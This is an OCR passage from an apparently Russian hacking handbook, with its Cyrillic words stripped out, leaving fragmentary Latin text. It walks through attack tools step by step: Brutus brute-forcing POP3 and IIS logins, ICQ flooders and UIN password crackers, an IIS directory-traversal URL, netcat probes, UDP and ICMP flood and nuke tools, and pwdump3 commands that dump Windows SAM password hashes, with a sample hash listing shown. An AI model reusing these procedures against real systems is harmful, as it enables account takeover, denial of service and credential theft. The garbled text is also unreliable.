Brutus - Brute Force Generation (Brutus - ) - , , . , - , Min Length ( ) 3, Max Length ( ) - 4. , Digits only ( ). . > Start () Brutus - 2 Brutus - 2. . 6.13.X Uiutus - 2 - www.hoobie.net/biutus - [Januaiy 2000J File Took Help Type|POP3 EJ | Start | Stop | Clear |
Puc. 6.13. 1. Positive Authentication Results ( ) , kolia - 0007. , Brutus 10997 alex-1.sword.net ( 11000). 5 Pentium 3 1000 , Ethernet 10 /. , , Brutus (
). -, , , ( 8 !), , (, &$ ..). ! Brutus - Brute Force Generation (Brutus - ) 8 , Full Keyspace ( ). Start () Brutus - 2 - 6 095 689 385 410 816 - , ! 12 ? , , , (., , [10]). Brutus, Pass Mode ( ). ( 100 000), , . , password, parol, MyPassword - Web- - . -, , , Ethernet, 30-50 / ( ). - . - , - , , , . . , , , , , . . - , .
IIS Brutus 8 , - . , , . , , , - , - ! : !. .
, , , . 1, , , , . - , , , , . , - ( - ), . , - , . . , TFTP 1-1 , 1-1 . , TFTP , . TFTP , , , . , , , , , . . , ,96
( ) . , , , Web- - .. ( , ). . - , , , -. . - , .. , - , , . , .. , - - . , 2002 ., , , . Web-. . . ... ( ). Web-, , ?, . , , ?, ?, ? . - , , , , . , , , , , . , , - , , repa_parenaia, - !
- . , , , , . 974 - 5830
- , , , - , . . , - . , . , ( ) , - ! . , 8 ( 12) , , . , DnD . . , - , Norton Antivirus MacAfee VirusScan. , - PGP Desktop Security. , . , - , , , . - - , .
7.
ICQ ICQ Intelligent Call Query, . ICQ [--] : I Seek You - ; , ICQ . ICQ , 1998 Mirabilis, ( 40 ) AOL. ICQ , ICQ , , . , , ICQ, , . , , - . ICQ , ICQ. ICQ , ICQ, , http://www.ICQ.com, http://mira-bilis.com. ICQ - ICQ , , 1998,1999, 2000, 2002, ICQ 2003. ICQ UDP, 4000, - TCP, . , ICQ, UIN (Unique Identification Number - ). UTN - ICQ , . , ICQ? ICQ , . , ? .
-, ICQ, . -, ICQ ICQ . , ICQ, : , UIN , , . , ICQ , - ICQ . , , - . ICQ-, , IP- ICQ-, , . , , DoS, 9 . , IP- ICQ, - , ICQ- . ! , ICQ-, . , , , - , . ICQ, Mirabilis . ICQ, ICQ , . , .
ICQ
ICQ . - , ICQ ICQ ICQ. , ICQ ; , ICQ- (, LameToy www.mirabilis.com). , ( ) , . , , , , , . , ICQ. . . Sword-2000 ICQ Groupware Server, Alex- ICQ Groupware Client, UESf, 1001, 1-1 , UIN, 1003. ICQ Groupware http://www.icq.com. ICQ, ICQ Groupware, , , 1. - , ICQ - , ICQ . ICQ ICQ-, ICQ-, ICQ- .
UIN ICQ- UIN ICQ, , UIN . UIN . , , - . - - , . , , . ( ) LameToy for ICQ (DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , . LameToy for ICQ. . 7.1 , LameToy for ICQ.LameToy For Icq [DBKILLER] | Send [ Losei-
Puc. 7.1. LameToy for ICQ (DBKILLER) ICQ LameToy for ICQ (DBKILLER) - Send (). , Setting () Loop () , . UIN, UIN# - Ran (Random - 102
ICQ ). , , , , . , ICQ-, - , UIN UIN . , ICQ (ICQ99a ICQ99b) . DB- ( - ), DB Data Base - , , DB NewDB. LameToy , DB killer ( DB) Setting (). ICQ, . , , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker .
lf~ac)peca ICQ- DoS ( ) , - . , , , Advanced ICQ IP Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml). . 7.2 Advanced ICQ IP Sniffer.Advanced ICQ IP SnifferYour UIN: [207685174 | Password: IJ Clear list Timeout. Tiy again. Saver
Puc. 7.2. - IP- ICQ
IP- ICQ UIN, Advanced ICQ IP Sniffer ICQ, UIN . , , Your UIN ( UIN) Password () Advanced ICQ IP Sniffer ( ICQ). Check () , ICQ UTN , Info () . , Info () . 7.2 , ( ) IP- ICQ, TCP-, ICQ . , , Ext IP ( ), Int IP ( IP) TCP Port ( TCP). , ICQ- ( ). ICQ, Advanced IP ICQ Sniffer, ICQ server's address and port ( ICQ), Server () . 7.3.ICQ server's address and portAddress: licq.rnirdbilis.com Port: [4000 |
ICQ server's address and port ( ICQ) Mirabilis ICQ 4000. , / IP- / .
. 7.. ICQ server's address and port ( ICQ)
ICQ, , , ICQ-, ICQ- ICQ. , , . , ICQ, ICQ-MultiWar (http://www.paybackproductions.com/), - ICQ Flooder (. 7.4).
Puc. 7.4. ICQ ICQ Flooder, . > Victim's address ( ) IP- ICQ. > ICQ-port ( ICQ) TCP. > , UIN . : UTN - Randomly generated UIN ( UIN), UIN UIN. UIN - Apparent source UIN ( UIN ) UIN, ICQ . > No. of Messages ( ) ICQ-. > Message () (- , ). > Send! () . - , ICQ, , - , , 105
http://mht.hut.ru/icq/icq.html, ( , , ICQ , ). ICQ - , , , - !
ICQ ICQ, ICQ, , . , , . , , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.OICO SubMachineGun vl.4 by uD File Settings About [ Bruteforce ] [... [ 13 Single [~~] Single About Agent Force!
Puc. 7.5. ICQ subMachineGun U1N ICQ
ICQ brute force - , , . . ICQ ICQ subMachineGun . > ICQ subMachineGun. > Settings * Connections&Cracking (&). , . 7.6.icq server [ Cracking ] 13 Stop if successful... Make log of cracked uins 0 Reconnect if timeout 0 Cut passwds length to 8 digits set timeout: relogln ; times port
Puc. 7.6. U1N icq server ( ICQ) ICQ, , ICQLmirabilis.server. port () 4000. Cracking () : Stop if successful ( ) ICQ. Make log if cracked uins ( UIN) ICQ.107
Reconnect if timeout ( ) ICQ . Cut password length to 8 digits ( 8- ) 8- . > set timeout ( ) 15 . > relogin ( ) ICQ 3. ICQ subMachineGun UIN . . > ICQ subMachineGun Bruteforce ( ) UIN. . Single () UIN, . Single () UIN. UIN, (...) Making victims list ( ), . 7.7. Making victims list ( ) Range () , , UIN ( - 100000) ( 900900).
Puc. 7.7. UIN
step () UIN ( - 100). Generate () UIN; .
ICQ , Generate () - UIN, , , .. Add () UIN . > UIN, Open () UIN ( UIN ). > - UIN , t0*"!. Clear () UIN ( ). UIN, . . > ICQ subMachineGun Bruteforce ( ) . . Single () , . Single () . > , (...) Make passlist ( ), . 7.8. Make passlist ( ) . > Open () ( ). - , ICQ.
Puc. 7.8.
v Generator () Add (). , .109
> , 0 *"**]. Clear () ( ). > , . . Force (). , ICQ subMachineGun v1.4 (. 7.9).OICQ SubMachineGun vl 4 by uD File Settings About
Puc. 7.9. - ICQ subMachineGun v1.4, UIN, ( , . 7.9 ). , , 15 , ICQ. - 45 , ( ). , , , , , .. - . ...110
ICQ
( -, , ICQ - . ICQ , ICQ . , ? - ! , ? , ICQ- , . , . ? , Windows. , . , ICQ , ICQ. ICQ-, , ElcomSoft Advanced ICQ Password Recovery (http://www.elcomsoft.com). , . . 7.10 Advanced ICQ Password Recovery.
Puc. 7.10. ICQ .dat ICQ, Advanced ICQ Password Recovery ( ICQ) .dat, ICQ.111
, , ICQ 2002 2002. 2002 , UIN .dat, .., , 207685174.dat (207685174 - UIN ). ICQ Password successfully found! ( ICQ ), (. 7.11).ICQ Password successfully found ! ICQ version: 99b-2000b UIN password:
Puc. 7.11. !
. 7.11, ICQ 99b - 2000b, ICQ 2002 ( ). , ICQ , - , - ICQ-. - , , (. [11]), Web- (. 8). , , , .
, ICQ ( ) , . , , , ICQ. , , ICQ - , - . , . ICQ, . . , , ICQ- - ICQ . , ICQ , UIN . - 112
ICQ ? , , , - , . , , - , , , , , , - . ICQ - , , , , , , , , . - , .. ICQ, , , . , ICQ ICQ, ICQ ( , ICQ Team (http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ. - , . , ? , , . , - , ? , ... , , , . ICQ-, - , .
ICQ , . ICQ - ,
ICQ-. ICQ DoS ... . ICQ . -, , ICQ-, ICQ-, ICQ- . ICQ, ICQ. IP- , , ICQ. ICQ . , ICQ-, UTN . , ICQ-, -, , BlacklCE Defender, DoS. - , , . , . , ICQ - . -, - ICQ, ICQ. , IP- ICQ-, - . , . , . ICQ , PGP Desktop Security 2.9, ICQ- . , PGP- ( [7]).
8.
Web-caumoft Web? , Web , . Web- , Web- . , , , . , Web- , , , , . HTML Web- ( - ), , . HTML . ( ). , Web-, , Web-, , . HTTP, , , . Web-, , . , Web-, DoS , , Yahoo. , Web-, , ( ) Web- , . Web , .
Web~cauma Web Web , , Web, Web,
, . -
Web - Web, Web . Web - , Web, Web . Web , . Web - Web, , Internet Explorer (ffi), - HTML Web-, HTTP, Web. Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation . Web, ASP (Active Server Page - ) CGI, , Java SUN, Apache Software Foundation . Web, Web, , . SQL Microsoft, Oracle Oracle . , , , - ODBC (Open Data Base Connectivity - ). - , , , , , ... ?
1 Web~cauma , Web-, . , .
Web- Web- - , , , , , Web . Web- - Web- , , TCP- 80, , Web-, ( CVE, Web-), Web- - . Web - - ASP, Java, CGI - , . Web - , -, , -, ( !). , , - . , , (cookie), , . - Web- , , . , , CGI- , - CGI- , , , . - , Web- , . - , Web- , , , - . - , , , Web-, Web-, . , (, . []). , , , , IIS 5. , 117
( HTTP), CGI- ( ) Web ( Web). Web- , . IIS , Web-, . , Web- , - , . - , Web-. - . , FTP- , , . , . Web- .
Web~cauma , Web-, . , , , , . , , . , Web- , - , , DNS-, . Web. , .
Web-
cbp Web- . . -, , - , . IP-, , , . Whols . -, HTML- Web- . HTML , Web, , . , , , , JavaScript . , HTML- Web Web- Teleport Pro. , , Whols - , , Web. whois ( Unix), Web- , whois Web-.
Whols . , , . 1999 - Network Solution (http://www.networksolution.com), , , InterNic (http://www.internic.net). / . Web-, Whois ( ), . Whois , ,
, DNS . , RIPE NCC (Network Coordinate Center - ), IP- . Web- RIPE NCC (http://www.ripe.net), . 8.1.t @ T 1 Aqp9c|fehltp://www.ripB.net/npen^^ub^^c^^ El ^ |
. 8.1. Web- RIPE NCC IP- Web- ? - - DNS - .
, SuperScan (http://www.foundstone.com), . 8.2. SuperScan, . > Start () - . > Stop () . > Scan type ( ) All list ports from ( ). > Start ().
. 8.2. SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. ( ), .
. 8.. IIS 5121
Legion (http://packetstormsecurity.org/ groups/rhinoS), - 1.0.0.1 . 8.3. , - IIS 5, - , ? .
II5 | IIS , HTTP (Hypertext Transfer Protocol - ) CGI (Common Gateway Interface - ), IIS, . HTTP , , [12], - Web . HTTP , GET. Web- (, ), GET, , , http://www.anyserver.com/documents/order.html. order.html /documents IIS, c:\inetpub\wwwroot\documents. CGI , , [12], . HTTP, : http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2 MyScript - , /scripts IIS, a ?1+2 , MyScript. IIS , , , . CGI, ASP (Active Server Pages - ) ISAPI (Internet Server Programming Interface - ). ASP : http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2= 2
Web- MyScript.asp, , , HTML. ISAPI , ISAPI. HTTP: http://www.anysite.com/isapi.111?1&2 , IIS, , .
HTTP , IIS . IIS 2.0 :
http://www.anysite.eom/.7.7.7.7.7winnt/secret.file Web- , secret.txt. - Windows, ACL. IIS , Web- [3]. IIS , , , , , SecurityLab.ru (http://www.securitylab.ru). IIS, netcat (http://www.atstake.com), (netcat - - [3] netcat IIS). netcat Sword-2000 , . netcat . > Alex- netcat, nc -vv 1.0.0.1 80. v GET / HTTP/ 1.0 111. . 8.4. GET / HTTP/1.0 IIS. . 8.4, HTML, .
ic-MCommand Piompl c:\test\netcat>nc -vv 1.0.0.1 80 GET / HTTP /1.0
nisnatch: SUORD-20UO != | DNS fud/reutl.0.0.1] 80 open SUORD-2000
suord-2000.suoi-d.net
HTTP/1.1 400 Bad Request
Seruer: M i c r o s o f t - I I S / S . 0 Date: Fri, 28 Feb 2003 12:55:40 GHI Content-Type: t e x t / h t n l Content-Length: 87 itml>ErrorThe parameter sent 17, rcud 224: NOISOCK C:\test4netcat>
Puc. 8.4. GET IIS netcat , GET Start () Brutus - 2 (. 8.20) . Brutus - 2 . 8.22.
Puc. 8.22. IIS ! , IIS , . 8.23, , .
Puc. 8.23. Web , Brutus , Web. CGI- Web-. () HTTP (Form) (HTTP ()) GET ,
, , , .
Web, , - . Web , . , , . , Windows NT/95/98, Web- CGI Vulnerability Scan D@MNED CGI Scanner 2.1, , , Web, , . , Web-, , , . Web - , Web- . , Web- - , Retina, , , [7]. Web- - , .
9.
UoS , TCP/IP, TCP/IP , . , , - , DoS (Denial of Service ). DoS -, TCP/IP . DoS , . DoS , , Yahoo, eBay, CNN.com, www.Microsoft.com, , [3]. , - , , , . DoS , , , , . , [3], DoS , . , , , , DoS Web-; , DoS . , , - , DoS. , DoS , . DoS , , , , - - IDS (, BlacklCE Defender (http://blackice.iss.net/)), .
DoS, , .
' DoS , . , , DoS . - , , , ( Web- Yahoo). . , , 1 ( 1544 /), , , 56 / ( ). - , , , . . - , . - , , . - , . , . - , , . . DoS , , .
DoS
, . 1, Web- [3], , . , , . , . , - UDP ICMP. DoS, , , /. .
, UDP UDP, . , DoS, UDP Flooder 2.0 Foundstone (http://www.foundstone.com), , - , . . 9.1 UDP Flooder 2.O. UDP Flooder 2.0, DoS 1-3 IP- 1.0.0.5 . > UDP Flooder 2.O. IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5. > Port () , 80, HTTP-.
Puc. 9.1. UDP Speed () LAN, . Data () Random ( ), - FileWindows Task Manager Opliont View Help Applications | Processes J Performance | Nettvi^ing [ . Sword > , , 20 000 30 000, . > Go (). > , , Stop (). . 9.2 Alex- , Networking ().146Adapter Name I Network Utilization I Link Speed I 10 Mbps
Puc. 9.2. 80%
DoS , - UDP, 50% . - , LAN Ethernet I DBase.
4>) ICMP ( ) ICMP (Internet Control Message Protocol - ) UDP. . 9.3 X-Script ICMP Bomber.pt ICMP Bomber vO 3 By Code Host |1.0.0.5 Packet Size: h ooOOO \ NumberToSenchhooo
Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs
. 9.. X-Script ICMP Bomber , , Host () IP- , Ping (). , Packet Size ( ) , Number to Send ( ) . - . . 9.4 , Alex- ( IP- , , 1.0.0.5). ICMP , ICMP (Internet Control Message Protocol - ) TCP/IP, ICMP . ICMP , Web-; ICMP .
Puc. 9.4. DoS !
Aht3K3 Smurf , , , DoS ? Smurf, . , , Smurf . ECHO () ICMP, . IP- , . , , - 10 , . , DoS, DDoS (Distributed DoS). DDoS -, . , ,
DoS DoS . DDoS WinTrinoo ( http://www.bindview.com), , , DDoS Win32. 2000 DDoS , Web- (, , , WinTrinoo). - Foundstone , , DoS.
DoS, , , , , . , , DoS, , . , . DoS PortFuck, ( TCP- , ). PortFuck - TCP- , . , , , TCP- , , , . . 9.5 PortFuck.! f PortFuck 1.02 PRIVATE BUILD .: Host: localhost Port: ] | START
Puc. 9.5. PortFuck 149
Nuke Nuke , DoS, , , -, . - , . TCP/IP ICMP, ICMP . - - , .. - ICMP, , , . , . - - , , , , . Web-, , . Nuke - . DoS Nuke , , Windows 2000/XP , Windows 9x. Windows 2000/XP, (, [4]). , Windows 9x, , . , . Nuke - , . , Windows Nuke'eM version 1.1, . 9.8. Nuke , - Alex-2, IP- 1.0.0.4 Windows 95. . > Address () Windows Nuke'eM version 1.1, . 9.8, IP- Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000). - Add () .152
DoS
Puc. 9.8. > Execute (). Windows Nuke'eM version 1.1 (. 9.9).Windows Nuke'eM - Version 1 . 1Rle
Puc. 9.9. Alex-2 ! > Alex-2, 1-2 Windows. Windows , . 9.10. , 1-2 - Nuke. , IRC- IP-. Windows , , , IDS ( BlacklCE Defender).
- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable: Datagram Too Big ( : ). , ICMP DoS , , , , , , . , , DoS, TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP- NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send. , nbname - , nbname, , nbname.
DoS - , . , , , . , [11] , , DoS, , , Web- . , Web-. - , DoS. DDoS - , , , , ,
DoS -. , Foundstone. , , .. , 1 , Foundstone . DDoS, , Foundstone . Foundstone, (Robin Keir), http://www.foundstone.com DDoSPing 2.0, -. , UDP, UDP . . 9.11 DDosPing 2.0, .-Target IP address range Start IP address End IP address |1.Q.Q.5| h.OO 5 -Transmission speed controlSpeed (pkts/sec)I 181 I
. 9.11. DDoS DDoSPing 2.0 . > Start IP address ( IP-) End IP-address ( -) IP- .157
> Speed () , , LAN. > , Configuration () . 9.12).
. 9.12. > , Windows defaults (Windows ) Unix defaults (Unix ), Windows Unix, . > , DDoSPing 2.0 , WinTrinoo, , - StachelDraht Tribe Flood Network. , (. 9.12). > DDoSPing 2.0 . 9.11 Start () . Infected Hosts ( ). , - Zombie Zapper (http://razor.bindview.com/tools/ ZombieZapper__form.shtml), WinTrinoo. . 9.13 , , , DDoSPing 2.O.158
DoS
Puc. 9.13. Zombie Zapper DDoSPing 2.0, Zombie Zapper , DDoSPing 2.O.
, , , DoS - , , 1 . , , - , , - Web- - . - , , , , , . DoS , - (-, , ) Web-. IP- ICMP-! EDS DP-, , , , Web. , - , . DoS , - - !159
10.
Windows ZOOO/Xf, , - () , , - , ( , , [1]). , , , - - . , . ? TCP/IP, . TCP/IP . . 1 , . - , , [11]. , , , . 1, , - .
cemu*TCf/lf IP- , ping , W2RK (Windows 2000 Resource Pack). - ICMP (Internet Control Message Protocol - ). . . 10.1 ping Sword-2000.
Windows 2000/XP \ Command Prompt
Pinging 1.Q.O.I with 32 bytes of data: Reply Reply Reply Reply fron fron fron fron 1.0.0.1: 1.0.0.1: 1.0.0.1: 1.0.0.1: bytes=32 bytes=32 bytes=32 bytes=32 tinenbtst
Sviord: Node Ipflddress: 11..0.5] Scope Id: I I NetBIOS Remote Machine Nane Table
SUORD-20QQ SUORD-2Q00 SUORD SUORD SUORD SUORD SWORD-20QGI SUORD MSBROUSE_ INef"Seruices IS-SUORD-2000. flDMINISlllfllOR 52-54-flB-14-S5-B4
Registered Registered Registered Registered Registered Registered Registere Registerei Registered Registered
Puc. 10.4. Sword-2000 , Administrator Sword-2000 CD-ROM. , - NetBIOS, Administrator, 7, 9, 13, 17, 139, 443, 1025, 1027 , :. Administrator - : .
Windows 2000/XP , pwdump3.exe Windows NT/2000/XP LC4 . , NetBIOS TCP/IP ( Windows 2000/XP )? , , SNMP (Simple Network Management Protocol - ), Windows NT/2000/XP. , SNMP, , , [11]. , , , .
Windows NT/2000/XP . , . , , , . - , ..
, . nbtstat MIB, - , (. [3] [4]). , , . , . D:\>net use \\1.0.0.1\1$ * /u:Administrator * , IPC$ Administrator. : Type password for \\1.0.0.1\IPC$: . , - 165
, , , . , , , SMBGrind, CyberCop Scanner Network Associates. ( [3]). - . , , , . Windows NT/2000/XP , SAM (Security Account Manager - ). SAM (, , ) , , , . , - , , , , . , SAM, LC4 ( LOphtcrack, - LC4) (http://www.atstake.com/research/redirect.html), . Samdump - SAM. Pwdump - , . Syskey SAM ( Syskey . 2). Pwdump2 - , Syskey. . Pwdump3 - , Pwdump2, . Syskey, 2; , SAM, Windows 2000/XP , Windows NT . 2 , , , . Sword-2000 PwdimpS, : C:\>pwdump3 sword-2000 > password.psw
Windows 2000/XP Sword-2000, password.psw. (Notepad) (. 10.5).sword.psw - Notepad File Edit Format Help \dministator: SOO:7A01665EB2B6C14AAD3B435B51404EE:OB0412D8761239A73143EFAE928E9FO A::: Guest:501 :NO PASSWORD*"' :NO PASSWORD * ::: krbtgt:S02:NO PASSWORD ' :7BD70B6AF1C3909E006426SFE207B256::: Alex:1110:7A01665EB2EB6C14MD3B43SB51404EE:OB0412D8761239A73143EFAE92eE9FOA;:: Alex-1:1113:7A01665EB2EB